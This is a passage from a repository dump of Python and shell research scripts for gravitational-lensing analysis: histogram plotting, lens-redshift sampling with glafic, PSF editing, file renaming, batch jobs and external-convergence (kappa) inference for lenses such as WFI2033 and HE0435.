%.3f ave = %.3f med = %.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\n ##ax.text(0.05, 0.6, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n #s = \"50: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\n ##ax.text(0.05, 0.4, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n #s = \"50: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\n ##ax.text(0.05, 0.2, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n #s = \"75: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\n ##ax.text(0.05, 0.7, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n #s = \"75: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\n ##ax.text(0.05, 0.5, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n #s = \"75: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\n ##ax.text(0.05, 0.3, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n #s = \"75: peak = %.3f ave = %.3f med = %.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\n ##ax.text(0.05, 0.1, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n\n if mode == \"sum\":\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.average(medsum50W1[i]),std50W1[i],np.average(medsum75W1[i]),std75W1[i])\n ax.text(0.05, 0.9, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.average(medsum50W2[i]),std50W2[i],np.average(medsum75W2[i]),std75W2[i])\n ax.text(0.05, 0.7, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.average(medsum50W3[i]),std50W3[i],np.average(medsum75W3[i]),std75W3[i])\n ax.text(0.05, 0.5, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.average(medsum50W4[i]),std50W4[i],np.average(medsum75W4[i]),std75W4[i])\n ax.text(0.05, 0.3, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 50: %.3f +/- %.3f\" % (np.average([np.average(medsum50W1[i]),np.average(medsum50W2[i]),np.average(medsum50W3[i]),np.average(medsum50W4[i])]),np.sqrt(np.std([np.average(medsum50W1[i]),np.average(medsum50W2[i]),np.average(medsum50W3[i]),np.average(medsum50W4[i])],ddof=1)**2 + np.average([std50W1[i],std50W2[i],std50W3[i],std50W4[i]])**2)) # the errors include in quadrature the scatter from 10 samplings, and from W1-4, for 50%\n ax.text(0.05, 0.1, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 75: %.3f +/- %.3f\" % (np.average([np.average(medsum75W1[i]),np.average(medsum75W2[i]),np.average(medsum75W3[i]),np.average(medsum75W4[i])]),np.sqrt(np.std([np.average(medsum75W1[i]),np.average(medsum75W2[i]),np.average(medsum75W3[i]),np.average(medsum75W4[i])],ddof=1)**2 + np.average([std75W1[i],std75W2[i],std75W3[i],std75W4[i]])**2))\n ax.text(0.05, 0.0, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n \n if mode == \"meds\":\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.median(medsum50W1[i]),std50W1[i],np.median(medsum75W1[i]),std75W1[i])\n ax.text(0.05, 0.9, s, fontsize=fontlabel, color='b',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.median(medsum50W2[i]),std50W2[i],np.median(medsum75W2[i]),std75W2[i])\n ax.text(0.05, 0.7, s, fontsize=fontlabel, color='g',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.median(medsum50W3[i]),std50W3[i],np.median(medsum75W3[i]),std75W3[i])\n ax.text(0.05, 0.5, s, fontsize=fontlabel, color='r',transform=ax.transAxes)\n s = \"50: %.3f +/- %.3f 75: %.3f +/- %.3f\" % (np.median(medsum50W4[i]),std50W4[i],np.median(medsum75W4[i]),std75W4[i])\n ax.text(0.05, 0.3, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 50: %.3f +/- %.3f\" % (np.average([np.median(medsum50W1[i]),np.median(medsum50W2[i]),np.median(medsum50W3[i]),np.median(medsum50W4[i])]),np.sqrt(np.std([np.median(medsum50W1[i]),np.median(medsum50W2[i]),np.median(medsum50W3[i]),np.median(medsum50W4[i])],ddof=1)**2 + np.average([std50W1[i],std50W2[i],std50W3[i],std50W4[i]])**2)) # the errors include in quadrature the scatter from 10 samplings, and from W1-4, for 50%\n ax.text(0.05, 0.1, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n s = \"W1-4 75: %.3f +/- %.3f\" % (np.average([np.median(medsum75W1[i]),np.median(medsum75W2[i]),np.median(medsum75W3[i]),np.median(medsum75W4[i])]),np.sqrt(np.std([np.median(medsum75W1[i]),np.median(medsum75W2[i]),np.median(medsum75W3[i]),np.median(medsum75W4[i])],ddof=1)**2 + np.average([std75W1[i],std75W2[i],std75W3[i],std75W4[i]])**2))\n ax.text(0.05, 0.0, s, fontsize=fontlabel, color='k',transform=ax.transAxes)\n \n if i == 0: plt.xlabel(r'$\\zeta_{gal}$', fontsize=fontabsciss)\n if i == 1: plt.xlabel(r'$\\zeta_{z}$', fontsize=fontabsciss)\n if i == 2: plt.xlabel(r'$\\zeta_{M_\\star}$', fontsize=fontabsciss)\n if i == 3: plt.xlabel(r'$\\zeta_{M^2_\\star}$', fontsize=fontabsciss)\n if i == 4: plt.xlabel(r'$\\zeta_{M^3_\\star}$', fontsize=fontabsciss)\n if i == 5: plt.xlabel(r'$\\zeta_{1/r}$', fontsize=fontabsciss)\n if i == 6: plt.xlabel(r'$\\zeta_{z/r}$', fontsize=fontabsciss)\n if i == 7: plt.xlabel(r'$\\zeta_{M_\\star/r}$', fontsize=fontabsciss)\n if i == 8: plt.xlabel(r'$\\zeta_{M^2_\\star/r}$', fontsize=fontabsciss)\n if i == 9: plt.xlabel(r'$\\zeta_{M^3_\\star/r}$', fontsize=fontabsciss)\n if i == 10: plt.xlabel(r'$\\zeta_{M^2_{\\star\\mathrm{,rms}}}$', fontsize=fontabsciss)\n if i == 11: plt.xlabel(r'$\\zeta_{M^3_{\\star\\mathrm{,rms}}}$', fontsize=fontabsciss)\n if i == 12: plt.xlabel(r'$\\zeta_{M^2_{\\star\\mathrm{,rms}}/r}$', fontsize=fontabsciss)\n if i == 13: plt.xlabel(r'$\\zeta_{M^3_{\\star\\mathrm{,rms}}/r}$', fontsize=fontabsciss)\n if i == 14: plt.xlabel(r'$\\zeta_\\mathrm{flexion}$', fontsize=fontabsciss)\n if i == 15: plt.xlabel(r'$\\zeta_\\mathrm{tidal}$', fontsize=fontabsciss)\n if i == 16: plt.xlabel(r'$\\zeta_\\mathrm{SIS}$', fontsize=fontabsciss)\n if i == 17: plt.xlabel(r'$\\zeta_\\mathrm{SIShalo}$', fontsize=fontabsciss)\n if i in [0,4,8,12,15]:\n plt.ylabel(\"Normalized counts\", fontsize=fontordonate)\n plt.tick_params(axis='x', labelsize=4)\n plt.tick_params(axis='y', labelsize=4)\n plt.setp(plt.xticks()[1], rotation=90)\n subplot = i+1\n print \"finished subplot %d/18; fraction of points inside the < %s cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, limit, float(q_W1_50.size)/q_W1_50read[0].size, float(q_W1_75.size)/q_W1_75read[0].size, float(q_W2_50.size)/q_W2_50read[0].size, float(q_W2_75.size)/q_W2_75read[0].size, float(q_W3_50.size)/q_W3_50read[0].size, float(q_W3_75.size)/q_W3_75read[0].size, float(q_W4_50.size)/q_W4_50read[0].size, float(q_W4_75.size)/q_W4_75read[0].size)\n\nplt.subplots_adjust(left=None, bottom=0.1, right=None, top=0.95, wspace=0.4, hspace=0.6)\nplt.subplot(5,4,5)\nplt.legend(bbox_to_anchor=(5, -5), loc='lower right', borderaxespad=0., fontsize=fontlegend)\nplt.savefig('%s%s_weightedcountshist_%sarcsec_%sinner_%s_%s_%s_%s_%s%s_zgap%s_%s.png' % (root, lens, radius, inner, mag, mode, photz, detect, irac, handpicked, zinf, zsup), dpi=500)\n \nprint(\" --- %s seconds ---\" % (time.time() - start_time))\n\nprint 'Done!'\n" }, { "alpha_fraction": 0.875, "alphanum_fraction": 0.875, "avg_line_length": 64, "blob_id": "92ac44098658e643d956a2836afb94ea665cdc33", "content_id": "70f7c61698f97923e434558d2c990853b2890c7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 64, "license_type": "no_license", "max_line_length": 64, "num_lines": 1, "path": "/python/readme.txt", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "Instruction to do get external convergence using weighted counts" }, { "alpha_fraction": 0.5799086689949036, "alphanum_fraction": 0.6287671327590942, "avg_line_length": 35.28333282470703, "blob_id": "35151f41550a9e780e1b298c567cabceeefd8c3f", "content_id": "4aa14b918fcabf2ee7d7f7b4ca29e0b7911bf072", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2190, "license_type": "no_license", "max_line_length": 211, "num_lines": 60, "path": "/python/modeling_utilities/samplezveldisp.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Varies the lens redshift and get resulting parameters. Uses mag2mag to find absolute mag\r\n\r\nimport sys\r\nimport os\r\nimport numpy as np\r\nimport corner\nimport pylab as plt\r\n\nsample=np.linspace(0.1,2.2,22)\n\nlistchi = np.array([])\nlist = np.array([])\nlistmag = np.array([])\nlistvel = np.array([])\n\r\nfilein = \"inlensz.input\"\nfileimag = \"outlensz_point.dat\"\nfileout = \"outlensz_optresult.dat\"\nfileres = \"samplezveldisp.dat\"\n\nfor i in range(len(sample)):\n with open(filein, 'r') as f:\n glafic = f.readlines()\n glafic[9-1] = glafic[9-1].replace(glafic[9-1].split()[1],str(sample[i]))\n with open(filein, 'w') as f:\n f.writelines(glafic)\r\n os.system(\"glafic %s\" % filein)\n\n with open(fileimag, 'r') as f:\n interest = f.readlines()\n if len(interest) == 5: # accept only if the model creates 4 images\n with open(fileout, 'r') as f:\n interest = f.readlines()\n for j in range(len(interest)):\n if \"lens sie\" in interest[j]:\n value = float(interest[j].split()[2])\n if \"chi\" in interest[j]:\n valuechi = float(interest[j].split()[2])\n listchi = np.append(listchi,valuechi)\n list = np.append(list,value)\n#np.savetxt(fileres,np.c_[sample,list,listchi],fmt=\"%.1f %d %.2f\")\n\nimport subprocess\nfor i in range(len(sample)):\n output = subprocess.check_output('$HOME/GITHUB/LensPop/stellarpop/mag2mag.py -vega -T El_cww -m1 17.33 -f1 VISTA_Ks -z1 %s -f2 R_Cousins -z2 0.0; exit 0' % str(sample[i]),stderr=subprocess.STDOUT,shell=True)\n listmag = np.append(listmag,float(output))\n listvel = np.append(listvel,150*((10**((4.65-float(output))/2.5))/(10**10))**0.25)\n\n#Galactic dynamics: log10(sigma/150km/s) = 0.25log10(L_R/(10^10*h_7^-2Lsun)) ->\n#sigma = 150km/s*[L_R/(10^10*Lsun)]^0.25\n#-2.5log10L_R[Lsun] = M_R - M_Rsun ->\n#L_R[Lsun] = 10^[(M_Rsun - M_R)/2.5] ->\n#sigma = 150km/s*[10^[(M_Rsun - M_R)/2.5]/10^10]^0.25\n#M_R Sun in AB from http://mips.as.arizona.edu/~cnaw/sun.html is 4.65\n# scatter in sigma = 0.25*sigma\n\nnp.savetxt(fileres,np.c_[sample,list,listchi,listmag,listvel],fmt=\"%.1f %d %.2f %.2f %d\")\nplt.plot(sample,list)\nplt.plot(sample,listvel)\nplt.show()\n\n\r\n\r\n" }, { "alpha_fraction": 0.6808943152427673, "alphanum_fraction": 0.7012194991111755, "avg_line_length": 29.6875, "blob_id": "70e3725df248b26d6165864e735bac4829ce8f94", "content_id": "51d34ea817c572d000d2d74b415446c983dae7f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 492, "license_type": "no_license", "max_line_length": 92, "num_lines": 16, "path": "/python/image_utilities/replacewings.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# Replace the wings of a PSF with an analytical model, given the PSF, the model and the mask\n\nimport numpy as np\nfrom astropy.io import fits\n\nsky = -256.5 # sky level in the psf\npsf = fits.open('i_psf.fits')\nmask = fits.open('msknegative.fits')\nmodel = fits.open('i_model.fits')\ndata_psf = psf[0].data - sky\ndata_mask = mask[0].data\ndata_model = model[0].data\nout = data_psf\nout[data_mask == 1] = data_model[data_mask == 1]\nmodel[0].data = out\nmodel.writeto('i_psfhybrid.fits',clobber=True)\n\n" }, { "alpha_fraction": 0.5541871786117554, "alphanum_fraction": 0.6149425506591797, "avg_line_length": 54.3636360168457, "blob_id": "b683a078aa0297258ca13dbb3f13450ec26c71e8", "content_id": "6c229968843bf22e0057c2116f3d7dc1c29998aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1218, "license_type": "no_license", "max_line_length": 160, "num_lines": 22, "path": "/python/catalogue_utilities/rename.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# rename all folders given a rule\n\nimport os\n\n#rootin = '/lfs08/rusucs/WFI2033/MSwghtratios/'\n#rootout = '/lfs08/rusucs/WFI2033/MSwghtratios/'\n#init = [x for x in os.listdir(rootin) if ('.lst' in x) and ('sampled.lst' not in x) and ('count.lst' not in x) and ('meds' in x) and ('orig' not in x)]\n#init = [x for x in os.listdir(rootin) if ('arcsecinnermsk.cat' in x)]\n#for i in range(len(init)):\n# indiv = [x.strip() for x in init[i].split(\"_\")]\n# out = indiv[0]+'_'+indiv[1]+'_'+indiv[2]+'_'+indiv[3]+'_'+indiv[4]+'_'+indiv[5]+'_'+indiv[6]+'_'+indiv[7]+'_23_'+indiv[8]+'_5arcsecinner_gap_-1.0_-1.0.cat'\n# os.system('mv %s%s %s%s' %(rootin,init[i],rootout,out))\n\nrootin = '/lfs08/rusucs/0408/MSgals/'\nrootout = '/lfs08/rusucs/WFI2033/MSwghtratios/'\ninit = [x for x in os.listdir(rootin) if ('arcsecinnermsk.cat' in x)]\nfor i in range(len(init)):\n indiv = [x.strip() for x in init[i].split(\"_\")]\n out = indiv[0]+'_'+indiv[1]+'_'+indiv[2]+'_'+indiv[3]+'_'+indiv[4]+'_'+indiv[5]+'_'+indiv[6]+'_'+indiv[7]+'_23_'+indiv[8]+'_5arcsecinner_gap_-1.0_-1.0.cat'\n os.system('mv %s%s %s%s' %(rootin,init[i],rootout,out))\n\n#GGL_los_8_7_7_3_3_N_4096_ang_4_SA_galaxies_on_plane_27_to_63_griz_0408.images_forNAOJ.txt\n" }, { "alpha_fraction": 0.6584440469741821, "alphanum_fraction": 0.766603410243988, "avg_line_length": 25.350000381469727, "blob_id": "b3962460571be50ed3bf6968c536754d790fcd62", "content_id": "8d4bd5539ef7f5a761e1f5c9b17af16f139a204a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 527, "license_type": "no_license", "max_line_length": 72, "num_lines": 20, "path": "/python/scripts/NAOJ/batch_infersim22.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log22s.out\n#PBS -e Log22s.err\n#PBS -N 22s\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappasimbias.py WFI2033 5 45 23 meds gal oneoverr mass2\npython inferkappasimbias.py WFI2033 5 120 23 meds gal oneoverr mass2\npython inferkappasimbiasphil.py WFI2033 5 45 23 meds gal oneoverr mass2\npython inferkappasimbiasphil.py WFI2033 5 120 23 meds gal oneoverr mass2\n" }, { "alpha_fraction": 0.5648470520973206, "alphanum_fraction": 0.6626016497612, "avg_line_length": 56.400001525878906, "blob_id": "2e8029d962bd24dd7c6ef3cdd4351894efd2b2c7", "content_id": "6e2c5a429e55225d21fd50e5fc3939805fb04129", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5166, "license_type": "no_license", "max_line_length": 971, "num_lines": 90, "path": "/python/plot_utilities/kappa_scaledstdchoice.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# uses the output of kappa_medsigsim.py to decide the based weight combination\n\nimport numpy as np\nfrom functools import reduce\n\nfile1 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_0/medstdbias_base120.dat\"\nfile2 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_1/medstdbias_base120.dat\"\nfile3 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_2/medstdbias_base120.dat\"\nfile4 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_0/medstdbias_base45.dat\"\nfile5 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_1/medstdbias_base45.dat\"\nfile6 = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/E2new5000_2/medstdbias_base45.dat\"\n\nf1 = np.genfromtxt(file1,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf2 = np.genfromtxt(file2,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf3 = np.genfromtxt(file3,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf4 = np.genfromtxt(file1,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf5 = np.genfromtxt(file2,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf6 = np.genfromtxt(file3,usecols=[0,3,4,5],dtype='S200,f,f,f')\nf1name = np.array([])\nf1los = np.array([])\nf1lines = np.array([])\nf1std = np.array([])\nf2name = np.array([])\nf2los = np.array([])\nf2lines = np.array([])\nf2std = np.array([])\nf3name = np.array([])\nf3los = np.array([])\nf3lines = np.array([])\nf3std = np.array([])\nf4name = np.array([])\nf4los = np.array([])\nf4lines = np.array([])\nf4std = np.array([])\nf5name = np.array([])\nf5los = np.array([])\nf5lines = np.array([])\nf5std = np.array([])\nf6name = np.array([])\nf6los = np.array([])\nf6lines = np.array([])\nf6std = np.array([])\nfor i in range(len(f1)):\n f1name = np.append(f1name,f1[i][0])\n f1los = np.append(f1los,f1[i][1])\n f1lines = np.append(f1lines,f1[i][2])\n f1std = np.append(f1std,f1[i][3])\nfor i in range(len(f2)):\n f2name = np.append(f2name,f2[i][0])\n f2los = np.append(f2los,f2[i][1])\n f2lines = np.append(f2lines,f2[i][2])\n f2std = np.append(f2std,f2[i][3])\nfor i in range(len(f3)):\n f3name = np.append(f3name,f3[i][0])\n f3los = np.append(f3los,f3[i][1])\n f3lines = np.append(f3lines,f3[i][2])\n f3std = np.append(f3std,f3[i][3])\nfor i in range(len(f4)):\n f4name = np.append(f4name,f4[i][0])\n f4los = np.append(f4los,f4[i][1])\n f4lines = np.append(f4lines,f4[i][2])\n f4std = np.append(f4std,f4[i][3])\nfor i in range(len(f5)):\n f5name = np.append(f5name,f5[i][0])\n f5los = np.append(f5los,f5[i][1])\n f5lines = np.append(f5lines,f5[i][2])\n f5std = np.append(f5std,f5[i][3])\nfor i in range(len(f6)):\n f6name = np.append(f6name,f6[i][0])\n f6los = np.append(f6los,f6[i][1])\n f6lines = np.append(f6lines,f6[i][2])\n f6std = np.append(f6std,f6[i][3])\n\nmatches = reduce(np.intersect1d, (f1name,f2name,f3name,f4name,f5name,f6name))\nmatches = np.sort(matches) # alphabetical sort\n\nout = np.zeros(21)\nfor i in range(len(matches)):\n med = np.around(np.mean([np.around(float(f1std[np.where(f1name == matches[i])][0]),3),np.around(float(f2std[np.where(f2name == matches[i])][0]),3),np.around(float(f3std[np.where(f3name == matches[i])][0]),3),np.around(float(f4std[np.where(f4name == matches[i])][0]),3),np.around(float(f5std[np.where(f5name == matches[i])][0]),3),np.around(float(f6std[np.where(f6name == matches[i])][0]),3)]),3)\n std = np.around(np.std([np.around(float(f1std[np.where(f1name == matches[i])][0]),3),np.around(float(f2std[np.where(f2name == matches[i])][0]),3),np.around(float(f3std[np.where(f3name == matches[i])][0]),3),np.around(float(f4std[np.where(f4name == matches[i])][0]),3),np.around(float(f5std[np.where(f5name == matches[i])][0]),3),np.around(float(f6std[np.where(f6name == matches[i])][0]),3)]),3)\n out_ = np.array([matches[i],int(f1los[np.where(f1name == matches[i])][0]),int(f2los[np.where(f2name == matches[i])][0]),int(f3los[np.where(f3name == matches[i])][0]),int(f4los[np.where(f4name == matches[i])][0]),int(f5los[np.where(f5name == matches[i])][0]),int(f6los[np.where(f6name == matches[i])][0]),int(f1lines[np.where(f1name == matches[i])][0]),int(f2lines[np.where(f2name == matches[i])][0]),int(f3lines[np.where(f3name == matches[i])][0]),int(f4lines[np.where(f4name == matches[i])][0]),int(f5lines[np.where(f5name == matches[i])][0]),int(f6lines[np.where(f6name == matches[i])][0]),np.around(float(f1std[np.where(f1name == matches[i])][0]),3),np.around(float(f2std[np.where(f2name == matches[i])][0]),3),np.around(float(f3std[np.where(f3name == matches[i])][0]),3),np.around(float(f4std[np.where(f4name == matches[i])][0]),3),np.around(float(f5std[np.where(f5name == matches[i])][0]),3),np.around(float(f6std[np.where(f6name == matches[i])][0]),3),med,std])\n out = np.c_[out,out_]\n\nfout = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/kappasim/scaledstdchoice.dat\"\nnp.savetxt(fout,out.T,fmt='%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s')\n\n# the RMS from inferkappasimbiasscript1.py and inferkappasimbiasscript2.py:\n#45: np.std([1.071,1.020,0.995,1.141,1.043,0.901,0.999,0.966,1.108,1.013,0.844,0.972,1.052,1.033,0.935]) = 0.074\n#120: np.std([1.168,0.992,1.069,1.008,0.955,0.955,1.071,0.932,1.031,0.977]) = 0.068\nrms2 = 2 * 0.045\n" }, { "alpha_fraction": 0.6029819250106812, "alphanum_fraction": 0.6631056666374207, "avg_line_length": 70.14068603515625, "blob_id": "a6b7be2f6c7587bebeddb76cd582f49d4c09e594", "content_id": "916f65bbaaec60deac30a08bedba73ba9cee2d86", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 51577, "license_type": "no_license", "max_line_length": 596, "num_lines": 725, "path": "/python/catalogue_utilities/inferkappa_unbiasedwithshear45and120FITSioHE0435_only3conjoinedorsingleshear_he0435unbias.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# CE Rusu Mar 9 2019\n# only use for HE0435\n# uses the old MS files from 2016, converted to FITS\n# Run as python /lfs08/rusucs/code/inferkappa_unbiasedwithshear45and120FITSioHE0435_only3conjoinedorsingleshear.py nohandpicked powerlawG1 5 24 45_gal 45_gamma 45_oneoverr\n# shear can be used as a single constraint\n\nimport sys\nimport os\nfrom os import system\nimport scipy as sp\nfrom scipy.stats import norm\nimport numpy as np\nimport time\nimport fitsio # https://github.com/esheldon/fitsio\n\nstart_time=time.time()\nhandpickedstr = str(sys.argv[1])\nother = str(sys.argv[2]) # refers to an optional suffix for the shear constraint\ninnermask = str(sys.argv[3])\nmag = str(sys.argv[4])\nconjoined = len(sys.argv) - 5 # total number of arguments including code name, minus the number of ones that are not weights\n\nif innermask == \"5\": only8 = False\nif innermask == \"12\": only8 = True # in this case run only 8/64 MS fields\nunbias = True # if True, do not divide by N_LOS (currently, this only applies when a single constraint, the shear, is used)\n\nif conjoined == 1:\n weightin1 = str(sys.argv[5])\nif conjoined == 3:\n weightin1 = str(sys.argv[5])\n weightin2 = str(sys.argv[6])\n weightin3 = str(sys.argv[7])\n\nprint \"conjoined:\", conjoined\nlens = \"HE0435\"\nroot = \"/lfs08/rusucs/HE0435/MSwghtratios/\"\nrootcode = \"/lfs08/rusucs/code/\"\nrootout = \"/lfs08/rusucs/HE0435/MSkapparesults/\"\n#rootout = \"/Volumes/LaCieSubaru/kapparesults/\"\n#rootout = \"/mnt/scratch/rusucs/%s/MSkapparesults/\" % lens\nif innermask == '5': weightsfile = np.loadtxt(rootcode+'weightedcounts_%s_meds_%s_%sinner_%s.cat' %(lens,mag,innermask,handpickedstr),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nif innermask == '12': weightsfile = np.loadtxt(rootcode+'weightedcounts_%s_meds_%s_%sinner_%s.cat' %(lens,mag,innermask,handpickedstr),usecols=[1,2,3],unpack=True)\nlimsigma = 2 # sigma limits on either side of the assumed gaussians\nbin_stat = 2000\nmin_kappa = -0.10\nmax_kappa = 1\n\nincrement1 = 2 # refers to the E interval from Greene et al. 2014\nincrement2 = 4\nincrement3 = 2\n\n# these quantities are only for dealing with galaxy groups\ndegree = np.pi / 180\nL_field = 4.0 * degree\nN_pix_per_dim = 4096\nL_pix = L_field / N_pix_per_dim\nrad = degree / 3600\n\n# define the shear constraints\n# OLD VALUES\n#if lens == \"HE0435\":\n# if other == 'fiducial' and innermask == '5':\n# constr_gamma = 0.030\n# constrwidth_gamma_inf = 0.027\n# constrwidth_gamma_sup = 0.033\n# if other == 'composite' and innermask == '5':\n# constr_gamma = 0.004\n# constrwidth_gamma_inf = 0.001\n# constrwidth_gamma_sup = 0.007\n# filters = \"ugriJHK\"\n# print 'shear: ',constr_gamma\n\nif lens == \"HE0435\":\n if other == 'powerlawG1' and innermask == '5':\n constr_gamma = 0.041\n constrwidth_gamma_inf = 0.023\n constrwidth_gamma_sup = 0.059\n if other == 'powerlaw5pert' and innermask == '12':\n constr_gamma = 0.056\n constrwidth_gamma_inf = 0.030\n constrwidth_gamma_sup = 0.082\n if other == 'compositeG1' and innermask == '5':\n constr_gamma = 0.026\n constrwidth_gamma_inf = 0.000\n constrwidth_gamma_sup = 0.052\n filters = \"ugriJHK\"\n print 'shear: ',constr_gamma\n\n# declare which weights to read\nmeasured_index45 = 0 # specifies the column index in weightsfile\nmeasured_index_inf45 = 1\nmeasured_index_sup45 = 2\nmeasured_index120 = 3\nmeasured_index_inf120 = 4\nmeasured_index_sup120 = 5\n\nif mag == \"24\":\n def declareweight(weightin):\n if weightin.split('_')[1] == \"gal\": weight_index = 4\n if weightin.split('_')[1] == \"z\": weight_index = 6\n if weightin.split('_')[1] == \"mass\": weight_index = 8\n if weightin.split('_')[1] == \"mass2\": weight_index = 10\n if weightin.split('_')[1] == \"mass3\": weight_index = 12\n if weightin.split('_')[1] == \"oneoverr\": weight_index = 14\n if weightin.split('_')[1] == \"zoverr\": weight_index = 16\n if weightin.split('_')[1] == \"massoverr\": weight_index = 18\n if weightin.split('_')[1] == \"mass2overr\": weight_index = 20\n if weightin.split('_')[1] == \"mass3overr\": weight_index = 22\n if weightin.split('_')[1] == \"mass2rms\": weight_index = 24\n if weightin.split('_')[1] == \"mass3rms\": weight_index = 26\n if weightin.split('_')[1] == \"mass2overrrms\": weight_index = 28\n if weightin.split('_')[1] == \"mass3overrrms\": weight_index = 30\n if weightin.split('_')[1] == \"flexion\": weight_index = 32\n if weightin.split('_')[1] == \"tidal\": weight_index = 34\n if weightin.split('_')[1] == \"SIS\": weight_index = 36\n if weightin.split('_')[1] == \"SIShalo\": weight_index = 38\n if weightin.split('_')[1] == \"gamma\": weight_index = None\n return weight_index\nif mag == \"23\":\n def declareweight(weightin):\n if weightin.split('_')[1] == \"gal\": weight_index = 5\n if weightin.split('_')[1] == \"z\": weight_index = 7\n if weightin.split('_')[1] == \"mass\": weight_index = 9\n if weightin.split('_')[1] == \"mass2\": weight_index = 11\n if weightin.split('_')[1] == \"mass3\": weight_index = 13\n if weightin.split('_')[1] == \"oneoverr\": weight_index = 15\n if weightin.split('_')[1] == \"zoverr\": weight_index = 17\n if weightin.split('_')[1] == \"massoverr\": weight_index = 19\n if weightin.split('_')[1] == \"mass2overr\": weight_index = 21\n if weightin.split('_')[1] == \"mass3overr\": weight_index = 23\n if weightin.split('_')[1] == \"mass2rms\": weight_index = 25\n if weightin.split('_')[1] == \"mass3rms\": weight_index = 27\n if weightin.split('_')[1] == \"mass2overrrms\": weight_index = 29\n if weightin.split('_')[1] == \"mass3overrrms\": weight_index = 31\n if weightin.split('_')[1] == \"flexion\": weight_index = 33\n if weightin.split('_')[1] == \"tidal\": weight_index = 35\n if weightin.split('_')[1] == \"SIS\": weight_index = 37\n if weightin.split('_')[1] == \"SIShalo\": weight_index = 39\n if weightin.split('_')[1] == \"gamma\": weight_index = None\n return weight_index\n\nweight1_index = declareweight(weightin1)\nif conjoined >= 2:\n weight2_index = declareweight(weightin2)\n if conjoined >= 3:\n weight3_index = declareweight(weightin3)\n\n# read weight constraints\nconstr_gal_meds45 = weightsfile[measured_index45][0]\nconstrwidth_gal_meds_inf45 = 